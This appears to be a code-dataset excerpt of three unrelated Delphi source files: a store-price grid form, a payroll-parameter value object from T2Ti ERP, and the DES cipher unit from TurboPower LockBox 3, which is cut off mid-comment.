text
stringlengths
14
6.51M
unit uSubStorePrice; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, uParentSub, siComp, siLangRT, DB, ADODB, cxStyles, cxCustomData, cxGraphics, cxFilter, cxData, cxEdit, cxDBData, cxGridLevel, cxClasses, cxControls, cxGridCustomView, cxGridCustomTableView, cxGridTableView, cxGridDBTableView, cxGrid; type TSubStorePrice = class(TParentSub) dsInventoryPrices: TADODataSet; grdPrices: TcxGrid; grdPricesDB: TcxGridDBTableView; grdPricesLevel: TcxGridLevel; dsInventoryPricesStore: TStringField; dsInventoryPricesStoreID: TIntegerField; dsInventoryPricesSellingPrice: TBCDField; dsInventoryPricesCostPrice: TBCDField; dsInventoryPricesStoreAvgPrice: TBCDField; dsInventoryPrice: TDataSource; grdPricesDBStore: TcxGridDBColumn; grdPricesDBSellingPrice: TcxGridDBColumn; grdPricesDBCostPrice: TcxGridDBColumn; grdPricesDBStoreAvgPrice: TcxGridDBColumn; procedure FormCreate(Sender: TObject); private fIDModel : Integer; fViewCost, fViewAvgCost : Boolean; protected sYes, sNo : String; procedure AfterSetParam; override; public procedure DataSetRefresh; procedure DataSetOpen; override; procedure DataSetClose; override; function GetCurrentKey: integer; override; end; implementation uses uDM, uParamFunctions, cxStyleSheetEditor, cxLookAndFeels, uPassword, uSystemConst, uDMGlobal, cxGridDBDataDefinitions; {$R *.dfm} procedure TSubStorePrice.AfterSetParam; begin inherited; fIDModel := StrToIntDef(ParseParam(FParam, 'IDModel'), 0); fViewCost := (StrToIntDef(ParseParam(FParam, 'ShowCost'), 0) = 1); fViewAvgCost := (StrToIntDef(ParseParam(FParam, 'ShowAvgCost'), 0) = 1); grdPricesDBCostPrice.Visible := fViewCost; grdPricesDBStoreAvgPrice.Visible := fViewAvgCost; DataSetRefresh; end; procedure TSubStorePrice.DataSetClose; begin inherited; with dsInventoryPrices do if Active then Close; end; procedure TSubStorePrice.DataSetOpen; begin inherited; with dsInventoryPrices do if not Active then begin Parameters.ParambyName('IDModel').Value := fIDModel; Open; end; end; procedure TSubStorePrice.DataSetRefresh; begin DataSetClose; DataSetOpen; end; procedure TSubStorePrice.FormCreate(Sender: TObject); begin inherited; Case DM.fGrid.Kind of 0 : grdPrices.LookAndFeel.Kind := lfStandard; 1 : grdPrices.LookAndFeel.Kind := lfFlat; 2 : grdPrices.LookAndFeel.Kind := lfUltraFlat; end; if (DM.fPredefinedStyle.Count > DM.fGrid.Layout) and (DM.fGrid.Layout<>-1) then TcxGridDBTableView(grdPrices.ActiveView).Styles.StyleSheet := TcxGridTableViewStyleSheet(DM.fPredefinedStyle.Objects[DM.fGrid.Layout]); Case DMGlobal.IDLanguage of LANG_ENGLISH : begin sYes := 'Yes'; sNo := 'No'; end; LANG_PORTUGUESE : begin sYes := 'Sim'; sNo := 'Não'; end; LANG_SPANISH : begin sYes := 'Sí'; sNo := 'No'; end; end; end; function TSubStorePrice.GetCurrentKey: integer; begin Result := dsInventoryPrices.FieldByName('StoreID').AsInteger; end; initialization RegisterClass(TSubStorePrice); end.
{******************************************************************************* Title: T2Ti ERP Description: VO relacionado à tabela [FOLHA_PARAMETRO] The MIT License Copyright: Copyright (C) 2016 T2Ti.COM Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. The author may be contacted at: t2ti.com@gmail.com @author Albert Eije (t2ti.com@gmail.com) @version 2.0 *******************************************************************************} unit FolhaParametroVO; {$mode objfpc}{$H+} interface uses VO, Classes, SysUtils, FGL; type TFolhaParametroVO = class(TVO) private FID: Integer; FID_EMPRESA: Integer; FCOMPETENCIA: String; FCONTRIBUI_PIS: String; FALIQUOTA_PIS: Extended; FDISCRIMINAR_DSR: String; FDIA_PAGAMENTO: String; FCALCULO_PROPORCIONALIDADE: String; FDESCONTAR_FALTAS_13: String; FPAGAR_ADICIONAIS_13: String; FPAGAR_ESTAGIARIOS_13: String; FMES_ADIANTAMENTO_13: String; FPERCENTUAL_ADIANTAM_13: Extended; FFERIAS_DESCONTAR_FALTAS: String; FFERIAS_PAGAR_ADICIONAIS: String; FFERIAS_ADIANTAR_13: String; FFERIAS_PAGAR_ESTAGIARIOS: String; FFERIAS_CALC_JUSTA_CAUSA: String; FFERIAS_MOVIMENTO_MENSAL: String; //Transientes published property Id: Integer read FID write FID; property IdEmpresa: Integer read FID_EMPRESA write FID_EMPRESA; property Competencia: String read FCOMPETENCIA write FCOMPETENCIA; property ContribuiPis: String read FCONTRIBUI_PIS write FCONTRIBUI_PIS; property AliquotaPis: Extended read FALIQUOTA_PIS write FALIQUOTA_PIS; property DiscriminarDsr: String read FDISCRIMINAR_DSR write FDISCRIMINAR_DSR; property DiaPagamento: String read FDIA_PAGAMENTO write FDIA_PAGAMENTO; property CalculoProporcionalidade: String read FCALCULO_PROPORCIONALIDADE write FCALCULO_PROPORCIONALIDADE; property DescontarFaltas13: String read FDESCONTAR_FALTAS_13 write FDESCONTAR_FALTAS_13; property PagarAdicionais13: String read FPAGAR_ADICIONAIS_13 write FPAGAR_ADICIONAIS_13; property PagarEstagiarios13: String read FPAGAR_ESTAGIARIOS_13 write FPAGAR_ESTAGIARIOS_13; property MesAdiantamento13: String read FMES_ADIANTAMENTO_13 write FMES_ADIANTAMENTO_13; property PercentualAdiantam13: Extended read FPERCENTUAL_ADIANTAM_13 write FPERCENTUAL_ADIANTAM_13; property FeriasDescontarFaltas: String read FFERIAS_DESCONTAR_FALTAS write FFERIAS_DESCONTAR_FALTAS; property FeriasPagarAdicionais: String read FFERIAS_PAGAR_ADICIONAIS write FFERIAS_PAGAR_ADICIONAIS; property FeriasAdiantar13: String read FFERIAS_ADIANTAR_13 write FFERIAS_ADIANTAR_13; property FeriasPagarEstagiarios: String read FFERIAS_PAGAR_ESTAGIARIOS write FFERIAS_PAGAR_ESTAGIARIOS; property FeriasCalcJustaCausa: String read FFERIAS_CALC_JUSTA_CAUSA write FFERIAS_CALC_JUSTA_CAUSA; property FeriasMovimentoMensal: String read FFERIAS_MOVIMENTO_MENSAL write FFERIAS_MOVIMENTO_MENSAL; //Transientes end; TListaFolhaParametroVO = specialize TFPGObjectList<TFolhaParametroVO>; implementation initialization Classes.RegisterClass(TFolhaParametroVO); finalization Classes.UnRegisterClass(TFolhaParametroVO); end.
{* ***** BEGIN LICENSE BLOCK ***** Copyright 2010 Sean B. Durkin This file is part of TurboPower LockBox 3. TurboPower LockBox 3 is free software being offered under a dual licensing scheme: LGPL3 or MPL1.1. The contents of this file are subject to the Mozilla Public License (MPL) Version 1.1 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.mozilla.org/MPL/ Alternatively, you may redistribute it and/or modify it under the terms of the GNU Lesser General Public License (LGPL) as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. You should have received a copy of the Lesser GNU General Public License along with TurboPower LockBox 3. If not, see <http://www.gnu.org/licenses/>. TurboPower LockBox is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. In relation to LGPL, see the GNU Lesser General Public License for more details. In relation to MPL, see the MPL License for the specific language governing rights and limitations under the License. The Initial Developer of the Original Code for TurboPower LockBox version 2 and earlier was TurboPower Software. * ***** END LICENSE BLOCK ***** *} unit uTPLb_DES; interface uses SysUtils, Classes, uTPLb_BlockCipher, uTPLb_StreamCipher; type TDES = class(TInterfacedObject, IBlockCipher, ICryptoGraphicAlgorithm) private function DisplayName: string; function ProgId: string; function Features: TAlgorithmicFeatureSet; function DefinitionURL: string; function WikipediaReference: string; function GenerateKey( Seed: TStream): TSymetricKey; function LoadKeyFromStream( Store: TStream): TSymetricKey; function BlockSize: integer; // in units of bits. Must be a multiple of 8. function KeySize: integer; function SeedByteSize: integer; // Size that the input of the GenerateKey must be. function MakeBlockCodec( Key: TSymetricKey): IBlockCodec; function SelfTest_Key: TBytes; function SelfTest_Plaintext: TBytes; function SelfTest_Ciphertext: TBytes; public constructor Create; end; TExpandedKey = array[ 0 .. 15 ] of uint64; {$IF CompilerVersion < 21} uint32 = cardinal; {$IFEND} // The following routines are exposed only for the sake of D-Unit tests. procedure IP_Transform( Datum: uint64; var L, R: uint32); procedure IP_InverseTransform( L, R: uint32; var Datum: uint64); procedure DES_EncryptBlock( Plaintext: uint64; var Ciphertext: uint64; const Key: TExpandedKey); procedure DES_DecryptBlock( Ciphertext: uint64; var Plaintext: uint64; const Key: TExpandedKey); procedure ExpandKey( Key: uint64; var Ex: TExpandedKey); function PC_1( K: uint64): uint64; function PC_2( L, R: uint32): uint64; function E_Bit_Selection( R: uint32): uint64; procedure SetParityBitsOnKey( var K: uint64); function hasCorrectParity( K: uint64): boolean; implementation uses uTPLb_Constants, uTPLb_I18n, uTPLb_StrUtils; { Information Resources ===================== (1) http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf (2) http://www.tropsoft.com/strongenc/des.htm (3) http://orlingrabbe.com/des.htm (4) http://en.wikipedia.org/wiki/Data_Encryption_Standard (5) http://www.itl.nist.gov/fipspubs/fip81.htm } { The DES standard describes a transform of 64 bits to 64 bits, with the bits numbered from 1 to 64 (see figure 1 of FIBS PUB 46-3). Somewhat annoyingly it does not define how these 64 bits are encoded in an 8-bit byte stream, in relation to endien-ness. There are at least 4 different endien encodings possible. This ambiguity in the standard is not cryptographically significant, but it does impact on implementation. In LockBox 3, the DES algorithm will use the following endien encoding: * Bit 1 (designated b1) is encoded in the most significant bit (MSB) of byte address 0. * Bit 2 (designated b2) is encoded in the 2nd MSB of byte address 0. * b8 is encoded in the LSB of byte address 0. * b9 is encoded in the MSB of byte address 1. * b64 is encoded in the LSB of byte address 7. } type TDESKey = class( TSymetricKey) private FNativeKey : uint64; FExpandedKey: TExpandedKey; public constructor Create( NativeKey1: uint64); constructor CreateFromStream( Store: TStream); procedure SaveToStream( Stream: TStream); override; procedure Burn; override; end; TDESCodec = class( TInterfacedObject, IBlockCodec) private FLockBoxKey: TDESKey; constructor Create( LockBoxKey1: TDESKey); procedure Encrypt_Block( Plaintext{in}, Ciphertext{out}: TMemoryStream); procedure Decrypt_Block( Plaintext{out}, Ciphertext{in}: TMemoryStream); procedure Reset; procedure Burn; end; function PC_1( K: uint64): uint64; var L, R: uint32; t8: byte; t32: uint32; t16: word; begin // input K = 57 58 59 60 61 62 63 64 | 49 50 51 52 53 54 55 56 | 41 42 43 44 45 46 47 48 | 33 34 35 36 37 38 39 40 | 25 26 27 28 29 30 31 32 | 17 18 19 20 21 22 23 24 | 9 10 11 12 13 14 15 16 1 2 3 4 5 6 7 8 //PC-1 output = //57 49 41 33 25 17 9 // 1 58 50 42 34 26 18 //10 2 59 51 43 35 27 //19 11 3 60 52 44 36 //63 55 47 39 31 23 15 // 7 62 54 46 38 30 22 //14 6 61 53 45 37 29 //21 13 5 28 20 12 4 // We desire result, such that: // result.Bytes[0] = 57 49 41 33 25 17 9 1 // result.Bytes[1] = 58 50 42 34 26 18 10 2 // result.Bytes[2] = 59 51 43 35 27 19 11 3 // result.Bytes[3] = 60 52 44 36 63 55 47 39 // result.Bytes[4] = 31 23 15 7 62 54 46 38 // result.Bytes[5] = 30 22 14 6 61 53 45 37 // result.Bytes[6] = 29 21 13 5 28 20 12 4 // result.Bytes[7] = 0 0 0 0 0 0 0 0 // In other words we wish to go from LR to L'R' where: //L = 25 26 27 28 29 30 31 32 17 18 19 20 21 22 23 24 9 10 11 12 13 14 15 16 1 2 3 4 5 6 7 8 //R = 57 58 59 60 61 62 63 64 49 50 51 52 53 54 55 56 41 42 43 44 45 46 47 48 33 34 35 36 37 38 39 40 // //L' = 60 52 44 36 63 55 47 39 59 51 43 35 27 19 11 3 58 50 42 34 26 18 10 2 57 49 41 33 25 17 9 1 //R' = 0 0 0 0 0 0 0 0 29 21 13 5 28 20 12 4 30 22 14 6 61 53 45 37 31 23 15 7 62 54 46 38 // Sample data: //K = (big-endien) 00010011 00110100 01010111 01111001 10011011 10111100 11011111 11110001 //K = (little-endien) 11110001 11011111 10111100 10011011 01111001 01010111 00110100 00010011 //L = 25 26 27 28 29 30 31 32 17 18 19 20 21 22 23 24 9 10 11 12 13 14 15 16 1 2 3 4 5 6 7 8 // 0 1 1 1 1 0 0 1 0 1 0 1 0 1 1 1 0 0 1 1 0 1 0 0 0 0 0 1 0 0 1 1 //R = 57 58 59 60 61 62 63 64 49 50 51 52 53 54 55 56 41 42 43 44 45 46 47 48 33 34 35 36 37 38 39 40 // 1 1 1 1 0 0 0 1 1 1 0 1 1 1 1 1 1 0 1 1 1 1 0 0 1 0 0 1 1 0 1 1 // Origin. Start with: L := Int64Rec( K).Lo; R := Int64Rec( K).Hi; //L = 25 26 27 28 29 30 31 32 17 18 19 20 21 22 23 24 9 10 11 12 13 14 15 16 1 2 3 4 5 6 7 8 //R = 57 58 59 60 61 62 63 64 49 50 51 52 53 54 55 56 41 42 43 44 45 46 47 48 33 34 35 36 37 38 39 40 // 0 1 1 1 1 0 0 1 0 1 0 1 0 1 1 1 0 0 1 1 0 1 0 0 0 0 0 1 0 0 1 1 // 1 1 1 1 0 0 0 1 1 1 0 1 1 1 1 1 1 0 1 1 1 1 0 0 1 0 0 1 1 0 1 1 // Step 1. Center byte swap. t8 := LongRec( L).Bytes[2]; LongRec( L).Bytes[2] := LongRec( L).Bytes[1]; LongRec( L).Bytes[1] := t8; t8 := LongRec( R).Bytes[2]; LongRec( R).Bytes[2] := LongRec( R).Bytes[1]; LongRec( R).Bytes[1] := t8; //L = 25 26 27 28 29 30 31 32 | 9 10 11 12 13 14 15 16 | 17 18 19 20 21 22 23 24 | 1 2 3 4 5 6 7 8 //R = 57 58 59 60 61 62 63 64 | 41 42 43 44 45 46 47 48 | 49 50 51 52 53 54 55 56 | 33 34 35 36 37 38 39 40 // 0 1 1 1 1 0 0 1 | 0 0 1 1 0 1 0 0 | 0 1 0 1 0 1 1 1 | 0 0 0 1 0 0 1 1 // 1 1 1 1 0 0 0 1 | 1 0 1 1 1 1 0 0 | 1 1 0 1 1 1 1 1 | 1 0 0 1 1 0 1 1 // Step 2. Swap nibbles in each L byte. L := ((L shl 4) and $F0F0F0F0) or ((L shr 4) and $0F0F0F0F); //L = 29 30 31 32 25 26 27 28 | 13 14 15 16 9 10 11 12 | 21 22 23 24 17 18 19 20 | 5 6 7 8 1 2 3 4 //R = 57 58 59 60 61 62 63 64 | 41 42 43 44 45 46 47 48 | 49 50 51 52 53 54 55 56 | 33 34 35 36 37 38 39 40 // Step 3. Swap high nibbles between L & R t32 := (L and $0F0F0F0F) or (R and $F0F0F0F0); R := (L and $F0F0F0F0) or (R and $0F0F0F0F); L := t32; //L = 57 58 59 60 25 26 27 28 | 41 42 43 44 9 10 11 12 | 49 50 51 52 17 18 19 20 | 33 34 35 36 1 2 3 4 //R = 29 30 31 32 61 62 63 64 | 13 14 15 16 45 46 47 48 | 21 22 23 24 53 54 55 56 | 5 6 7 8 37 38 39 40 // Step 4. Swap bytes t8 := LongRec( L).Bytes[1]; LongRec( L).Bytes[1] := LongRec( R).Bytes[0]; LongRec( R).Bytes[0] := t8; t8 := LongRec( L).Bytes[3]; LongRec( L).Bytes[3] := LongRec( R).Bytes[2]; LongRec( R).Bytes[2] := t8; //L = 13 14 15 16 45 46 47 48 | 41 42 43 44 9 10 11 12 | 5 6 7 8 37 38 39 40 | 33 34 35 36 1 2 3 4 //R = 29 30 31 32 61 62 63 64 | 57 58 59 60 25 26 27 28 | 21 22 23 24 53 54 55 56 | 49 50 51 52 17 18 19 20 // Step 5. 2-bit swap // L = a-->d b // R = c d-->a T32 := ((L shr 2) xor R) and $33333333; R := R xor T32; L := L xor (T32 shl 2); //L = 31 32 15 16 63 64 47 48 | 59 60 43 44 27 28 11 12 | 23 24 7 8 55 56 39 40 | 51 52 35 36 19 20 3 4 //R = 29 30 13 14 61 62 45 46 | 57 58 41 42 25 26 9 10 | 21 22 5 6 53 54 37 38 | 49 50 33 34 17 18 1 2 // Step 5. Word swap t16 := LongRec( L).Lo; LongRec( L).Lo := LongRec( R).Hi; LongRec( R).Hi := t16; //L = 31 32 15 16 63 64 47 48 | 59 60 43 44 27 28 11 12 | 29 30 13 14 61 62 45 46 | 57 58 41 42 25 26 9 10 //R = 23 24 7 8 55 56 39 40 | 51 52 35 36 19 20 3 4 | 21 22 5 6 53 54 37 38 | 49 50 33 34 17 18 1 2 // Step 6. 1-bit swap // L = a b-->c // R = c-->b d T32 := ((R shr 1) xor L) and $55555555; L := L xor T32; R := R xor (T32 shl 1); //L = 31 23 15 7 63 55 47 39 | 59 51 43 35 27 19 11 3 | 29 21 13 5 61 53 45 37 | 57 49 41 33 25 17 9 1 //R = 32 24 16 8 64 56 48 40 | 60 52 44 36 28 20 12 4 | 30 22 14 6 62 54 46 38 | 58 50 42 34 26 18 10 2 // Step 6. byte swap t8 := LongRec( R).Bytes[0]; LongRec( R).Bytes[0] := LongRec( L).Bytes[1]; LongRec( L).Bytes[1] := t8; t8 := LongRec( R).Bytes[2]; LongRec( R).Bytes[2] := LongRec( L).Bytes[3]; LongRec( L).Bytes[3] := t8; //L = 60 52 44 36 28 20 12 4 | 59 51 43 35 27 19 11 3 | 58 50 42 34 26 18 10 2 | 57 49 41 33 25 17 9 1 //R = 32 24 16 8 64 56 48 40 | 31 23 15 7 63 55 47 39 | 30 22 14 6 62 54 46 38 | 29 21 13 5 61 53 45 37 // Step 7. Clear R high byte. LongRec( R).Bytes[3] := 0; //L = 60 52 44 36 28 20 12 4 | 59 51 43 35 27 19 11 3 | 58 50 42 34 26 18 10 2 | 57 49 41 33 25 17 9 1 //R = 0 0 0 0 0 0 0 0 | 31 23 15 7 63 55 47 39 | 30 22 14 6 62 54 46 38 | 29 21 13 5 61 53 45 37 // Step 8. Swap nibbles: R[0].LoN <--> R[1].LoN . t8 := LongRec( R).Bytes[0] and $0F; LongRec( R).Bytes[0] := (LongRec( R).Bytes[0] and $F0) or (LongRec( R).Bytes[1] and $0F); LongRec( R).Bytes[1] := (LongRec( R).Bytes[1] and $F0) or t8; //L = 60 52 44 36 28 20 12 4 | 59 51 43 35 27 19 11 3 | 58 50 42 34 26 18 10 2 | 57 49 41 33 25 17 9 1 //R = 0 0 0 0 0 0 0 0 | 31 23 15 7 63 55 47 39 | 30 22 14 6 61 53 45 37 | 29 21 13 5 62 54 46 38 // Step 9. Swap nibbles: L[3].LoN <--> R[2].LoN . and // R[2].HiN <--> R[0].HiN t8 := LongRec( R).Bytes[2]; LongRec( R).Bytes[2] := (LongRec( R).Bytes[0] and $F0) or (LongRec( L).Bytes[3] and $0F); LongRec( L).Bytes[3] := (LongRec( L).Bytes[3] and $F0) or (t8 and $0F); LongRec( R).Bytes[0] := (t8 and $F0) or (LongRec( R).Bytes[0] and $0F); //L = 60 52 44 36 63 55 47 39 | 59 51 43 35 27 19 11 3 | 58 50 42 34 26 18 10 2 | 57 49 41 33 25 17 9 1 //R = 0 0 0 0 0 0 0 0 | 29 21 13 5 28 20 12 4 | 30 22 14 6 61 53 45 37 | 31 23 15 7 62 54 46 38 // ... which is our desired final result! //L' = 60 52 44 36 63 55 47 39 59 51 43 35 27 19 11 3 58 50 42 34 26 18 10 2 57 49 41 33 25 17 9 1 //R' = 0 0 0 0 0 0 0 0 29 21 13 5 28 20 12 4 30 22 14 6 61 53 45 37 31 23 15 7 62 54 46 38 // Marshal the return. Int64Rec( result).Lo := L; Int64Rec( result).Hi := R end; function PC_2( L, R: uint32): uint64; // input L = 25 26 27 28 0 0 0 0 | 17 18 19 20 21 22 23 24 | 9 10 11 12 13 14 15 16 | 1 2 3 4 5 6 7 8 (Little-endien) // input R = 53 54 55 56 0 0 0 0 | 45 46 47 48 49 50 51 52 | 37 28 39 40 41 42 43 44 | 29 30 31 32 33 34 35 36 //PC-2 output = //14 17 11 24 1 5 // 3 28 15 6 21 10 //23 19 12 4 26 8 //16 7 27 20 13 2 //41 52 31 37 47 55 //30 40 51 45 33 48 //44 49 39 56 34 53 //46 42 50 36 29 32 // Unlike PC-1 in which we marshaled the result by packing the bits, // for this return, we want to marshal the result into 8 times 6 bits, // with the result in the low 6 bits of each byte. // We desire result, such that: // result.Bytes[0] = 0 0 14 17 11 24 1 5 // result.Bytes[1] = 0 0 3 28 15 6 21 10 // result.Bytes[2] = 0 0 23 19 12 4 26 8 // result.Bytes[3] = 0 0 16 7 27 20 13 2 // result.Bytes[4] = 0 0 41 52 31 37 47 55 // result.Bytes[5] = 0 0 30 40 51 45 33 48 // result.Bytes[6] = 0 0 44 49 39 56 34 53 // result.Bytes[7] = 0 0 46 42 50 36 29 32 // In other words we wish to go from LR to L'R' where: // L = 25 26 27 28 0 0 0 0 | 17 18 19 20 21 22 23 24 | 9 10 11 12 13 14 15 16 | 1 2 3 4 5 6 7 8 // R = 53 54 55 56 0 0 0 0 | 45 46 47 48 49 50 51 52 | 37 28 39 40 41 42 43 44 | 29 30 31 32 33 34 35 36 // // L' = 0 0 16 7 27 20 13 2 | 0 0 23 19 12 4 26 8 | 0 0 3 28 15 6 21 10 | 0 0 14 17 11 24 1 5 // R' = 0 0 46 42 50 36 29 32 | 0 0 44 49 39 56 34 53 | 0 0 30 40 51 45 33 48 | 0 0 41 52 31 37 47 55 // Ex. 1: $3201073F2F0B3006 = PC_2( $F05599E1, $E0F1CCAA); // Ex. 2: $25273C36193B1A1E = PC_2( $F0AB32C3, $D0E39955); // http://orlingrabbe.com/des.htm test data: // C1D1 = 1110000 1100110 0101010 1011111 1010101 0110011 0011110 0011110 (big-endien compact 56 bits) // L = 1110000 1100110 0101010 1011111 (big-endien compact 28 bits; 7 bit groups) // L = 11100001 10011001 01010101 11110000 (big-endien 32 bits; 8 bit groups) // L = 1111 0000 0101 0101 1001 1001 1110 0001 (little-endien 32 bits; 4 bit groups) // L = $F05599E1; (Delphi) // R = 1010101 0110011 0011110 0011110 (big-endien compact 28 bits; 7 bit groups) // R = 10101010 11001100 11110001 11100000 (big-endien 32 bits; 8 bit groups) // R = 1110 0000 | 1111 0001 | 1100 1100 | 1010 1010 (little-endien 32 bits; 4 bit groups) // R = $E0F1CCAA (Delphi) // K1 = 000110 110000 001011 101111 111111 000111 000001 110010 (big-endien compact 48 bits; 6 bit rows) // K1 = 00000110 00110000 00001011 00101111 00111111 00000111 00000001 00110010 (big-endien 64 bits; 8 bit rows) // K1 = 0011 0010 | 0000 0001 | 0000 0111 | 0011 1111 | 0010 1111 | 00001 011 | 0011 0000 | 0000 0110 (little-endien 64 bits; 4 bit rows) // K1 = $3201073F2F0B3006; (Delphi) var b0, b1, b2, b3, b4, b5, b6, b7: byte; begin // Sledge-hammer approach. This implementation is not as efficient as it // could be. The reader is invited to exlore more efficient solutions. // Please keep me advised. b0 := LongRec( L).Bytes[0]; // $E1 b1 := LongRec( L).Bytes[1]; // $99 b2 := LongRec( L).Bytes[2]; // $55 b3 := LongRec( L).Bytes[3]; // $F0 b4 := LongRec( R).Bytes[0]; // $AA b5 := LongRec( R).Bytes[1]; // $CC b6 := LongRec( R).Bytes[2]; // $F1 b7 := LongRec( R).Bytes[3]; // $E0 // The following code was programmatically generated, deriving from the // published PC-2 table. Int64Rec( result).Bytes[ 0] := ((b1 and $04) shl 3) or // DONE ((b2 and $80) shr 3) or ((b1 and $20) shr 2) or ((b2 and $01) shl 2) or ((b0 and $80) shr 6) or ((b0 and $08) shr 3); // Expect = $06 Int64Rec( result).Bytes[ 1] := (b0 and $20) or // DONE (b3 and $10) or ((b1 and $02) shl 2) or (b0 and $04) or ((b2 and $08) shr 2) or ((b1 and $40) shr 6); // Expect = $30 Int64Rec( result).Bytes[ 2] := ((b2 and $02) shl 4) or // DONE ((b2 and $20) shr 1) or ((b1 and $10) shr 1) or ((b0 and $10) shr 2) or ((b3 and $40) shr 5) or (b0 and $01) ; // Expect = $0B Int64Rec( result).Bytes[ 3] := ((b1 and $01) shl 5) or // DONE ((b0 and $02) shl 3) or ((b3 and $20) shr 2) or ((b2 and $10) shr 2) or ((b1 and $08) shr 2) or ((b0 and $40) shr 6); // Expect = $2F // 0 0 41 52 31 37 47 55 Int64Rec( result).Bytes[ 4] := ((b5 and $08) shl 2) or // DONE ((b6 and $01) shl 4) or // ((b4 and $20) shr 2) or // ((b5 and $80) shr 5) or // ((b6 and $20) shr 4) or // ((b7 and $20) shr 5); // Expect = $3F bit 55; e=1;g=0 // 0 0 30 40 51 45 33 48 Int64Rec( result).Bytes[ 5] := ((b4 and $40) shr 1) or // DONE (b5 and $10) or // ((b6 and $02) shl 2) or // ((b6 and $80) shr 5) or // ((b4 and $08) shr 2) or // ((b6 and $10) shr 4); // Expect = $07 // 0 0 44 49 39 56 34 53 Int64Rec( result).Bytes[ 6] := ((b5 and $01) shl 5) or // DONE ((b6 and $08) shl 1) or // ((b5 and $20) shr 2) or // ((b7 and $10) shr 2) or // e=1;g=0 ((b4 and $04) shr 1) or // ((b7 and $80) shr 7); // Expect = $01 // 0 0 46 42 50 36 29 32 Int64Rec( result).Bytes[ 7] := ((b6 and $40) shr 1) or // DONE ((b5 and $04) shl 2) or ((b6 and $04) shl 1) or ((b4 and $01) shl 2) or ((b4 and $80) shr 6) or ((b4 and $10) shr 4); // Expect = $32 end; procedure Roll1( var Value: uint32); // Does a big-endien roll left 1 // going from C to C' thus: // C = 25 26 27 28 0 0 0 0 | 17 18 19 20 21 22 23 24 | 9 10 11 12 13 14 15 16 | 1 2 3 4 5 6 7 8 // C' = 26 27 28 1 0 0 0 0 | 18 19 20 21 22 23 24 25 |10 11 12 13 14 15 16 17 | 2 3 4 5 6 7 8 9 begin Value := ((Value shl 1) and $EEFEFEFE) or ((Value and $80808000) shr 15) or ((Value and $00000080) shl 21) end; procedure ExpandKey( Key: uint64; var Ex: TExpandedKey); const isTwoRolls: array[0..15] of boolean = ( False, False, True, True, True , True , True, True, False, True , True, True, True , True , True, False); var CD: uint64; C, D: uint32; i: integer; begin CD := PC_1( Key); C := int64Rec( CD).Lo and $F0FFFFFF ; // Low 28 big-endien bits. D := ((int64Rec( CD).Lo shr 20) and $000000F0) or // Next 28 big-endien bits. ((int64Rec( CD).Hi shl 12) and $F0F0F000) or ((int64Rec( CD).Hi shr 4) and $0F0F0F0F); for i := 0 to 15 do begin // Example test data from http://orlingrabbe.com/des.htm // C0 = 1111000011001100101010101111 (big-endien; 28 bits) // C0 = 11110000110011001010101011110000 (big-endien; 32 bits = 28 + 4 zeroes at the end) // C0 = 1111 0000 | 1100 1100 | 1010 1010 | 1111 0000 (big-endien; 32 bits = 28 + 4 zeroes at the end) // C0 = 1111 0000 | 1010 1010 | 1100 1100 | 1111 0000 (litte-endien 32 bits) // C0 = F 0 A A C C F 0 (litte-endien hex) // C0 = $F0AACCF0; (Delphi) // C1 = C0 [big-endien roll left] 1 // C1 = 1110000110011001010101011111 (big-endien 28 bits) // C1 = 1110 0001 | 1001 1001 | 0101 0101 | 1111 0000 (big-endien 32 bits) // C1 = 1111 0000 | 0101 0101 | 1001 1001 | 1110 0001 (little-endien 32 bits) // C1 = $F05599E1; (Delphi) Roll1( C); // For test data case and i=0, check C = $F05599E1 Roll1( D); if isTwoRolls[i] then begin Roll1( C); Roll1( D); end; Ex[i] := PC_2( C, D) // K1 = 000110 110000 001011 101111 111111 000111 000001 110010 (big-endien 48; 6-bit groups) // K1 = 110010 000001 000111 111111 101111 001011 110000 000110 (little-endien 48; 6-bit groups) // K1 = 00110010 00000001 00000111 00111111 00101111 00001011 00110000 00000110 (little-endien 64; 8-bit groups = 48 bits + 2MSB zeros) // K1 = $3201073F2F0B3006; (Delphi) // Ex[0] = $3201073F2F0B3006 = PC_2( $F05599E1, $E0F1CCAA); // Ex[1] = $25273C36193B1A1E = PC_2( $F0AB32C3, $D0E39955); end end; procedure IP_Transform( Datum: uint64; var L, R: uint32); // See IP_InverseTransform for an explaination of how this works. var T32: uint32; T16: word; T8: byte; begin L := Int64Rec( Datum).Lo; R := Int64Rec( Datum).Hi; T32 := ((L shr 4) xor R) and $0F0F0F0F; R := R xor T32; L := L xor (T32 shl 4); T16 := LongRec(L).Lo; LongRec(L).Lo := LongRec(R).Hi; LongRec(R).Hi := T16; T32 := ((R shr 2) xor L) and $33333333; L := L xor T32; R := R xor (T32 shl 2); T8 := LongRec(R).Bytes[0]; LongRec(R).Bytes[0] := LongRec(L).Bytes[1]; LongRec(L).Bytes[1] := T8; T8 := LongRec(R).Bytes[2]; LongRec(R).Bytes[2] := LongRec(L).Bytes[3]; LongRec(L).Bytes[3] := T8; T32 := ((L shr 1) xor R) and $55555555; R := R xor T32; L := L xor (T32 shl 1) { http://orlingrabbe.com/des.htm gives an example in a binary lowest-address=byte-left, MSB-within-byte-left format: M = 0000 0001 0010 0011 0100 0101 0110 0111 1000 1001 1010 1011 1100 1101 1110 1111 IP = 1100 1100 0000 0000 1100 1100 1111 